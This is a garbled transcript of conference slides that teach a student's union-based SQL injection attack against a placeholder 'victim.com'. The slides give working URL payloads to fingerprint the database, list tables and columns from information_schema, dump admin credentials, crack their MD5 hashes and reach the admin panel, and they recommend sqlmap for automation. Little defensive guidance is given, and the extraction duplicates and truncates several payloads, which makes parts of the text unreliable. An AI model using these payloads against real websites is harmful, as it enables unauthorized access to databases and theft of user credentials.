$Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... ·...

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Transcript of $Who I am? - HconGroupsgroups.hcon.in/uploads/1/8/1/9/1819392/hga_naeem_mansuri_-_sql... ·...

$Who I am?

Naeemahemad Mansuri

Student of Semester II of Master in Computer Application in


Individual Security Researcher Individual Security Researcher

Contact :

FB -> fb.me/mansurinaeem

G talk -> mansurinaeem101@gmail.com


� F-Secure claims 500,000 sites affected

by SQL injection in 2008

� According to http://www.zone-h.org

defacement statistics are 1 to 5 million defacement statistics are 1 to 5 million

web site

� Over 1.5 million pages affected by the

shadow server with the help of SQL

injection attacks

SQL Injection VulnerabilitySQL Injection VulnerabilitySQL Injection VulnerabilitySQL Injection Vulnerability

Web Server DBMSWeb Server

DBMS Server



Select * from table name where id=123


In the background when we execute or type this url so at that time it’s go to

database and perform query which is written in the application like

Select * from table name where id =123

So After Completion of out Request We Get the Response from the Web

server with database so we get the Result

SQL injection Basic Concept

SQL injection Classification in Web Application

SQL Injection Vulnerability

Blind Injection

Simple Blind SQL Injection Double Blind SQL Injection

SQL Injection

Method to Detect the SQL Injection

• Fuzzing

• Function Testing

• Analysis of Source Code

Example to Checking the web site is vulnerable or not

http://www.victim.com/site.php?id=123 ‘ (single Quote)

http://www.victim.com/site.php?id=123 ‘’ (double Quote)

http://www.victim.com/site.php?id=123 ‘-- (SQ minus minus)

http://www.victim.com/site.php?id=123 ‘/*

http://www.victim.com/site.php?id=123 ‘#

Error in SQL injection

Error Message You get when you perform SQL injection on the Web Application

Finding the Number of Columns

Ok now lets go ahead after Find the SQL Vulnerable Web site now we find the

Number of column in Database for that order by query is use

http://www.victim.com/site.php?id=123 order by 1 (No Error)

http://www.victim.com/site.php?id=123 order by 2 (No Error)

http://www.victim.com/site.php?id=123 order by 3 (No Error)

http://www.victim.com/site.php?id=123 order by 4 (No Error)

http://www.victim.com/site.php?id=123 order by 5 (No Error)

http://www.victim.com/site.php?id=123 order by 6 (No Error)

http://www.victim.com/site.php?id=123 order by 7 (Error)

If the above query not work then add --,--+,--+-

Finding the Vulnerable ColumnsAfter find the number of column in database we have to find the number of

Vulnerable Columns or Vulnerable Column for that we use union select or

Union select all command and we have to put – sign before id

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,2,3,4,5,6 - -

It’s Look Like

Finding the version, user, database

nameAfter finding the vulnerable Column in the database we have to find the user

Name of database, database name, version which is used in the web site.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,user(),3,4,5,6 --

http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --http://www.victim.com/site.php?id=-123 union select 1,database(),3,4,5,6 --

http://www.victim.com/site.php?id=-123 union select 1,version(),3,4,5,6 --

Finding the Tables Name in the DB

After finding the version user and database we have to find the number of tables

In the database. In the vulnerable column we have write concat(table_name)

Or group_concat(table_name) and at the end we have to write

from information_schema.tables where table_schema=database()--

• Syntax• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(table_name),

3,4,5,6 from information_schema.tables where table_schema=database()--

This Query is Display all the table name.

Finding the columName of Table

After finding the Names of tables we have to find the Columns names

In that Table for that we have write concat(column_name)

Or group_concat(column_name) and at the end we have to write

from information_schema.columns where table_name=char()()--

• Syntax• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(column_name),

3,4,5,6 from information_schema.column where table_name=char()()--

* We have to convert the table name in the mysqlchar()

This Query is Display all the column name of the table.

Extract the Data

Now we have to Extract the data so when we have perform the column query

So after that we have to extract or dump the data.

• Syntax

http://www.victim.com/site.php?id=-123 union select 1,concat(coulumne1,0x3a,http://www.victim.com/site.php?id=-123 union select 1,concat(coulumne1,0x3a,


3,4,5,6 from admin--

* If admin not work then convert the table name in the mysqlchar()

This Query is Display all the data DUMP data.

Login voilaAfter dump the data we have to find the admin panel of the web site

And after so for that you have to do







We have try guess and you got the admin panel.

If at the time of dump data if you not get the password in the text mode so

You have to decrypt it with this web site -> www.md5decrypter.co.uk/

Automated Exploitation of SQL injection

• SQLMAP (sqlmap.sourceforge.net or sqlmap.org )

Full Support : Mysql, MSsql, Oracle, Postgresql

• SQLUS (sqlsus.sourceforge.net)

Partial Support : Only Mysql Support



Full Support : if you Purchase it :P

Partial Support : is also Available

You can develop your own Script and tools to Exploit if the web site is

Vulnerable to SQL Injection it is up to you.

Material of SQL injection & Reference

• http://www.php.net/manual/en/security.database.sql-



•SQL Injection Attacks and Defense - Syngress publication•SQL Injection Attacks and Defense - Syngress publication

-Justin Claarke

•http://www.Pentestmonkey.net Cheat Sheets:

(Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2,
